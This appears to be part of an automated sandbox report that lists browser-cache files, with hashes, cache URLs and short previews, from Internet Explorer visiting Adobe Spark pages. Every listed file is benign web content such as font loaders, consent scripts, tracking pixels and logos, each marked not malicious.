                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):18234
                                                                                                                                                                                                                                                        Entropy (8bit):5.586204667535263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:x2V02tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:8V6q1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:DAF93A792133E2F3BB29B04E819231C5
                                                                                                                                                                                                                                                        SHA1:5597BCE352A8B04E573CCECA126EB4912C626A9E
                                                                                                                                                                                                                                                        SHA-256:1B586E639CBD3E2276EB3A1DE829E913806653FE43D5C19A7ACA128A43DC69F1
                                                                                                                                                                                                                                                        SHA-512:9B409DDCCD60E505C008B88D55052723F2A25B62ABA596A1BB9FEAC1230DD037DB551F7A5928A6ACC5E158219B441E7B9428159885D6638497B2B5F9B2D42F9B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000003b9b3f85. * - http://typekit.com/eulas/00000000000000003b9b3f88. * - http://typekit.com/eulas/00000000000000003b9b3f83. * - http://typekit.com/eulas/00000000000000003b9b3f8a. * proxima-nova:. * - http://typekit.com/eulas/00000000000000003b9b3068. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-serif",".tk-adobe-clean","\"adobe-clean\",sans-serif"],"fi":[139,7180,7182,7184,7185],"fc":[{"id":139,"family":"proxima-nova","src":"https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/{format}{?primer,subset_id,fvd,v}","descript
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\onz5gap[2].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):18234
                                                                                                                                                                                                                                                        Entropy (8bit):5.586204667535263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:x2V02tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:8V6q1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:DAF93A792133E2F3BB29B04E819231C5
                                                                                                                                                                                                                                                        SHA1:5597BCE352A8B04E573CCECA126EB4912C626A9E
                                                                                                                                                                                                                                                        SHA-256:1B586E639CBD3E2276EB3A1DE829E913806653FE43D5C19A7ACA128A43DC69F1
                                                                                                                                                                                                                                                        SHA-512:9B409DDCCD60E505C008B88D55052723F2A25B62ABA596A1BB9FEAC1230DD037DB551F7A5928A6ACC5E158219B441E7B9428159885D6638497B2B5F9B2D42F9B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/onz5gap.js
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000003b9b3f85. * - http://typekit.com/eulas/00000000000000003b9b3f88. * - http://typekit.com/eulas/00000000000000003b9b3f83. * - http://typekit.com/eulas/00000000000000003b9b3f8a. * proxima-nova:. * - http://typekit.com/eulas/00000000000000003b9b3068. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-serif",".tk-adobe-clean","\"adobe-clean\",sans-serif"],"fi":[139,7180,7182,7184,7185],"fc":[{"id":139,"family":"proxima-nova","src":"https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/{format}{?primer,subset_id,fvd,v}","descript
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\organizer[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                                                                                                        Entropy (8bit):4.655646724079179
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:xC1QtrrX8YDGLSMLBs6TeQca9r5qn:xC1QtnRDQSKprca/qn
                                                                                                                                                                                                                                                        MD5:580A7ACDCEF4380F0D805227BEE8B5A5
                                                                                                                                                                                                                                                        SHA1:E8F88656955C9BB5F788587E2F7BB8E936B5A39E
                                                                                                                                                                                                                                                        SHA-256:D153238766EB74073E2497DF5D37EB9B37172485F36981A702FA7D8483CF03AB
                                                                                                                                                                                                                                                        SHA-512:5CE7FF2AF32A53FE1809CA63CD8C56A79FB6CFB77D765C47B3DC0C9874D29CB6A50D9418C9CF2E390B2E1A45D16EB20A085A87440F30FDB1EBABD7EA47CE1EB3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/sp-storage/organizer?n=1623400853691&incCollabOnly=none
                                                                                                                                                                                                                                                        Preview: window._sgPreloadUnauth = true; if (window.marvel) { window.marvel.events.trigger('sg-preload-ready'); }
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\organizer[2].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):104
                                                                                                                                                                                                                                                        Entropy (8bit):4.655646724079179
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:xC1QtrrX8YDGLSMLBs6TeQca9r5qn:xC1QtnRDQSKprca/qn
                                                                                                                                                                                                                                                        MD5:580A7ACDCEF4380F0D805227BEE8B5A5
                                                                                                                                                                                                                                                        SHA1:E8F88656955C9BB5F788587E2F7BB8E936B5A39E
                                                                                                                                                                                                                                                        SHA-256:D153238766EB74073E2497DF5D37EB9B37172485F36981A702FA7D8483CF03AB
                                                                                                                                                                                                                                                        SHA-512:5CE7FF2AF32A53FE1809CA63CD8C56A79FB6CFB77D765C47B3DC0C9874D29CB6A50D9418C9CF2E390B2E1A45D16EB20A085A87440F30FDB1EBABD7EA47CE1EB3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/sp-storage/organizer?n=1623400864173&incCollabOnly=none
                                                                                                                                                                                                                                                        Preview: window._sgPreloadUnauth = true; if (window.marvel) { window.marvel.events.trigger('sg-preload-ready'); }
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\otSDKStub[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):17401
                                                                                                                                                                                                                                                        Entropy (8bit):5.344614273829078
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:gQp/LPwSNk3Alwshci9wfW0vMfPPVMmXUxcjz3ZYzVO2zswGBF27iIvZo:TR7MQOsrjyMfPPGg3ZsVowGv2uIvZo
                                                                                                                                                                                                                                                        MD5:E72DDCAFA303FF93A0E0FD6B4E335633
                                                                                                                                                                                                                                                        SHA1:0148771023BF66CAFD35D8F35881A196662A71DA
                                                                                                                                                                                                                                                        SHA-256:1DD4C3F1EA5B28CA04D4F2391197C4B57EF93D2D79CA0656BF6C5D588408E325
                                                                                                                                                                                                                                                        SHA-512:9888A900B039BD6364FBDDBBC37AF57011583EB7ED92BF769CA6EB560EDA8FD8163B7701C9CBA3108E966CEE01C2C864E212B1163C5281C102410A2B8683C92F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                                                                                                                                                                                                        Preview: var OneTrustStub=function(e){"use strict";var t,o,n,a,i,r,s,l,c,p,u,d,m,h,g,f,b,A,y,C,v,I,w,S,L,T,R,B,D,_,G,P,E,U,k,O,F,V,x,N,H,M,j,K,z,q,J,W,Y,Q,X,Z,$,ee=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\p[1].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                        MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                        SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                        SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                        SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://p.typekit.net/p.gif?s=1&k=rbi5aua&ht=tk&h=spark.adobe.com&f=171.172.173.174.175.176.5474.5475.146&a=1655249&js=1.20.0&app=typekit&e=js&_=1623433218993
                                                                                                                                                                                                                                                        Preview: GIF89a.............,..............;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\p[2].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                        Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                        MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                        SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                        SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                        SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://p.typekit.net/p.gif?s=1&k=vtg4qoo&ht=tk&h=spark.adobe.com&f=7180.7182.7184.22474.10294.10296.10302&a=1655249&js=1.20.0&app=typekit&e=js&_=1623433266626
                                                                                                                                                                                                                                                        Preview: GIF89a.............,..............;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\privacy[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                                                                        Entropy (8bit):5.112303491915906
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPjL2OJi+KqD:J0+ox0RJWWPmURT
                                                                                                                                                                                                                                                        MD5:603135FFA99C99EBB6FFD7EF15DA8695
                                                                                                                                                                                                                                                        SHA1:23A1A98130B2E61338488568BC33668B74D13760
                                                                                                                                                                                                                                                        SHA-256:64162C4EB0A1C365FD77EF01458B6C7967AAE790E3E41ABE18ECBF7C7D210439
                                                                                                                                                                                                                                                        SHA-512:FABF700B5CD145EA54862968220F841E107F0A871CFC9A34C100FDAB5B8761BE5B9C03CE425A849F0AEABFD2F72B675A2B617BF0698C55A8ED74F6CAC9887203
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://www.adobe.com/privacy.html">here</a>.</p>.</body></html>.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\rbi5aua[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):19114
                                                                                                                                                                                                                                                        Entropy (8bit):5.570400661578598
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:KefQe2tpIgIPs51iRm2lIew42noFeFsP9btiCtpIaCR:NQMq1iRm2XwMqsbbt6J
                                                                                                                                                                                                                                                        MD5:D464D0A61D4E34F4C431CA31D0F7E6E8
                                                                                                                                                                                                                                                        SHA1:73716727BFD77BA586E907A9FFC33FFC39CA73BF
                                                                                                                                                                                                                                                        SHA-256:29B51B31FAF8A954EC0209189E1A6491AFE94CBE50D1E16679FBA7561AD2BC5C
                                                                                                                                                                                                                                                        SHA-512:9B6FB7EBF94F0B42242A335B72B0C6A43DA7071B6AE9715FF70F96D54A4CA157D16A6F11B7D4C3573053E96DE06DD30791AB655BD55EEB5F3FB68989C3CB8B6D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/rbi5aua.js
                                                                                                                                                                                                                                                        Preview: /*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * proxima-nova:. * - http://typekit.com/eulas/0000000000000000000158d3. * - http://typekit.com/eulas/0000000000000000000158d4. * - http://typekit.com/eulas/000000000000000000017709. * - http://typekit.com/eulas/0000000000000000000158d6. * - http://typekit.com/eulas/0000000000000000000158d7. * - http://typekit.com/eulas/0000000000000000000158d8. * - http://typekit.com/eulas/0000000000000000000158d9. * - http://typekit.com/eulas/00000000000000000001705b. * proxima-nova-condensed:. * - http://typekit.com/eulas/00000000000000000000ffd9. *. * . 2009-2021 Adobe Systems Incorporated. All Rights Reserved.. */.if(!window.Typekit)window.Typekit={};window.Typekit.config={"a":"1655249","c":[".tk-proxima-nova","\"proxima-nova\",sans-
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\resume[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):29860
                                                                                                                                                                                                                                                        Entropy (8bit):5.336118019104802
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:QcqgrhFCbzs/syscBbV3peHlX58J61FYPSdppeoJX1voYAtrBchWyTAiIaD1adQy:ZDRSwGlBH71z4
                                                                                                                                                                                                                                                        MD5:B5E54419B7EFEED6E4754663FB34AFBD
                                                                                                                                                                                                                                                        SHA1:2D50AE237D8EA963A9FCA1DDDB86FE9E2299E799
                                                                                                                                                                                                                                                        SHA-256:54E61AEB95BE92C8F60F4DAA3EEF07C2F6DB0E927EEC0CCFCDF6DAA42C9AC73C
                                                                                                                                                                                                                                                        SHA-512:DC2A2A87816BF2EF481402500D64671A97DE5A367E0C2D9F9ED612EFBBB733ED4D9D0E807B0662CDA8DAE0AFDBB3A65D3959FE9888A9472D34FE2D76368CF897
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/resume
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html><html><head><title>Free Resume Templates | Adobe Spark</title><link rel="canonical" href="https://www.adobe.com/express/discover/templates/resume"><meta name="x-source-hash" content="9Akjq+sAdBpcoocA"><meta name="description" content="With Adobe Spark, choose from dozens of resume templates online to help you easily create your own custom resume in minutes. All creative skill levels are welcome."><meta property="og:title" content="Free Resume Templates | Adobe Spark"><meta property="og:description" content="With Adobe Spark, choose from dozens of resume templates online to help you easily create your own custom resume in minutes. All creative skill levels are welcome."><meta property="og:url" content="https://www.adobe.com/express/discover/templates/resume"><meta property="og:image" content="https://www.adobe.com/express/discover/templates/media_1d475ea237f3632359c1538d48da93b1deff5ed7e.png?width=1200&amp;format=pjpg&amp;optimize=medium"><meta property="og:image:secure_u
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\runtime-prod.gz[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):342968
                                                                                                                                                                                                                                                        Entropy (8bit):5.371093003938434
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:ECIBkfxBva98Hrj4SRZxFzb7jvSvguFyLllmEuKP:/IABl+vSP
                                                                                                                                                                                                                                                        MD5:B0F0C32B9B49DD909CF36FDF4ABA491C
                                                                                                                                                                                                                                                        SHA1:4DD35EEAA3B72879BBADED3E25109983EC736214
                                                                                                                                                                                                                                                        SHA-256:FAF1701455C322D60D4B5B27832D2430EE3B9C3D6B52D7771B4BB6F224784540
                                                                                                                                                                                                                                                        SHA-512:8481D9DAC37657EA7B97E639282332524BAD837F8BDFC004B9885A10FCC145B0BA9A65C0F6CEEE30BFD2A37D03575A04AE2352080300FD96AA71C34E4111157F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.js
                                                                                                                                                                                                                                                        Preview: !function(a){function b(d){if(c[d])return c[d].exports;var e=c[d]={exports:{},id:d,loaded:!1};return a[d].call(e.exports,e,e.exports,b),e.loaded=!0,e.exports}var c={};b.m=a,b.c=c,b.p="",b(0)}([function(a,b,c){var d,e;d=[c(1),c(72),c(73),c(74),c(76),c(78)],void 0!==(e=function(a){return a.Experiments&&(a.Bootstrap.disable(),a.Bootstrap.run()),a}.apply(b,d))&&(a.exports=e)},function(a,b,c){var d,e;d=[c(33),c(40),c(39),c(35),c(34),c(41),c(43),c(44),c(45),c(46),c(48),c(49),c(47),c(53),c(50),c(51),c(2),c(52),c(54),c(55),c(56),c(57),c(58),c(59),c(63),c(64),c(67),c(68),c(69),c(70),c(71),c(66)],void 0!==(e=function(a){return window.Luca=a,a}.apply(b,d))&&(a.exports=e)},function(a,b,c){var d,e;d=[c(3),c(4),c(33),c(34)],void 0!==(e=function(a,b,c,d){var e=c.getSectionsArticleHandler("default");c.registerSectionsArticleHandler("split-layout-base",a.extend({},e,{_initialize:function(b,c){var d=a(b),f=d.data("timeline"),g=d.find(".section-background"),h=d.find(".section-content");this._resetElement
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\runtime.gz[1].css
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):73425
                                                                                                                                                                                                                                                        Entropy (8bit):4.977204259182636
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:lfwoF8BD5hj74zan5tDdSJkR5f2zSJI3JxETmkN13hychWMobOGU9O:lfwoF8BDn5tZ/RJ2SN13hs
                                                                                                                                                                                                                                                        MD5:413473DA67E4B51BA0944226E77C3F56
                                                                                                                                                                                                                                                        SHA1:D8A80CE0CA07C5A65D9FE76EE6A5DB3D68668E78
                                                                                                                                                                                                                                                        SHA-256:630DD73CC8AD2A52615AED23D16CAB6F05C1307655414D4EBE97B6E252302A8D
                                                                                                                                                                                                                                                        SHA-512:451C48BCA87744FB76B40CE4A65E853FF3E3F3658A9AD9D483F0385D79EFC916358D6B42BF4EC1AE782F696ACD77A476E3155080B5FF18E4F68488CE46D0CBA6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/runtime.gz.css
                                                                                                                                                                                                                                                        Preview: .wp-progress-bar,.wp-progress-bar-clip,.wp-progress-bar-view{top:0;left:0;position:absolute}.article iframe,.article img{max-width:100%}.report-abuse-dialog .report-abuse-dialog-article-contents,html{-webkit-tap-highlight-color:transparent}.wp-progress-bar{right:0;bottom:auto;height:1em}.wp-progress-bar-clip{right:0;bottom:0}.wp-progress-bar-view{right:auto;bottom:0;width:0%;background-color:#000}.wp-scrollbar{z-index:5;position:absolute;opacity:0;background-color:rgba(255,255,255,.8);-webkit-transition:opacity .3s ease-out;-moz-transition:opacity .3s ease-out;-o-transition:opacity .3s ease-out;-ms-transition:opacity .3s ease-out;transition:opacity .3s ease-out;box-shadow:0 0 2px rgba(0,0,0,.5)}.wp-scrollbar.visible{opacity:1}.wp-scrollbar-track{position:absolute;top:2px;right:2px;bottom:2px;left:2px}.wp-scrollbar-thumb{position:absolute;top:0;left:0;background-color:rgba(0,0,0,.5)}.wp-scrollbar.horizontal{right:16px;bottom:0;left:0;height:16px}.wp-scrollbar.horizontal .wp-scrollbar-th
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\s75114678598274[1].gif
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 2 x 2
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                        Entropy (8bit):3.0780023067505042
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CnwltxlHlrn:Xn
                                                                                                                                                                                                                                                        MD5:AD480FD0732D0F6F1A8B06359E3A42BB
                                                                                                                                                                                                                                                        SHA1:A544538683A2DFE574EEB2E358AC8FCC78289D50
                                                                                                                                                                                                                                                        SHA-256:A1ECBAED793A1F564C49C671F2DD0CE36F858534EF6D26B55783A06B884CC506
                                                                                                                                                                                                                                                        SHA-512:8717074DDF1198D27B9918132A550CB4BA343794CC3D304A793F9D78C9FF6C4929927B414141D40B6F6AD296725520F4C63EDEB660ED530267766C2AB74EE4A9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: GIF89a.............!.......,............Q.;
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\spark[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3245
                                                                                                                                                                                                                                                        Entropy (8bit):5.201590437010129
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:EOjZfymEL6GBGTGGcnxv1U9KByhSl+x4rvdk6:Hj1yR6GBh1ChSQSLy6
                                                                                                                                                                                                                                                        MD5:907B6C4171506C79784218007A40BA44
                                                                                                                                                                                                                                                        SHA1:439E9CAF7CDC5B93A3CA412EC4EDA6338997644A
                                                                                                                                                                                                                                                        SHA-256:AC0A282DCE35E91B761D9E69142973C44CD495E468434DCF1AD249F498D00788
                                                                                                                                                                                                                                                        SHA-512:BD968C37D67A94827BF555E5A013A45CECB0DEC045815B00091FC8BF4B9F0F32064F9ED8395D3D7A625BD287D462EA271834E65D9886EA436029045DEEEC0A44
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [..<!ENTITY ns_extend "http://ns.adobe.com/Extensibility/1.0/">..<!ENTITY ns_ai "http://ns.adobe.com/AdobeIllustrator/10.0/">..<!ENTITY ns_graphs "http://ns.adobe.com/Graphs/1.0/">..<!ENTITY ns_vars "http://ns.adobe.com/Variables/1.0/">..<!ENTITY ns_imrep "http://ns.adobe.com/ImageReplacement/1.0/">..<!ENTITY ns_sfw "http://ns.adobe.com/SaveForWeb/1.0/">..<!ENTITY ns_custom "http://ns.adobe.com/GenericCustomNamespace/1.0/">..<!ENTITY ns_adobe_xpath "http://ns.adobe.com/XPath/1.0/">.]>.<svg version="1.1" id="Livello_1" xmlns:x="&ns_extend;" xmlns:i="&ns_ai;" xmlns:graph="&ns_graphs;".. xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 240 234".. style="enable-background:new 0 0 240 234;" xml:space="pres
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\spark_logo_v2[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):2146
                                                                                                                                                                                                                                                        Entropy (8bit):4.6117195503782
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Cl5MbaB081uNPETSn63o902pBDpxnzJ8bXUJnQ:8Kf84JEmuEBD3nKmQ
                                                                                                                                                                                                                                                        MD5:7AAAA0B29E8320F055FCB0A8D8A9686C
                                                                                                                                                                                                                                                        SHA1:812CEB49C501F9EB444AF3C8DE86D6B61D052024
                                                                                                                                                                                                                                                        SHA-256:00E24734BE21E153DCE4E51E078A05D9A191EA74185D225C4A27B4434E7A0578
                                                                                                                                                                                                                                                        SHA-512:C3456DFF9ACB7C31CD886866EF1E2EBFC3E950DE77E1785F644F8713C89426AE6FBB7F14A1880805A5DCF8C8327FD4DE4ADB07510537E0436B007C7A9E27B92D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://s3.amazonaws.com/adobe-luca-prod-ue1-assets/experiments/chrome/images/spark_logo_v2.svg
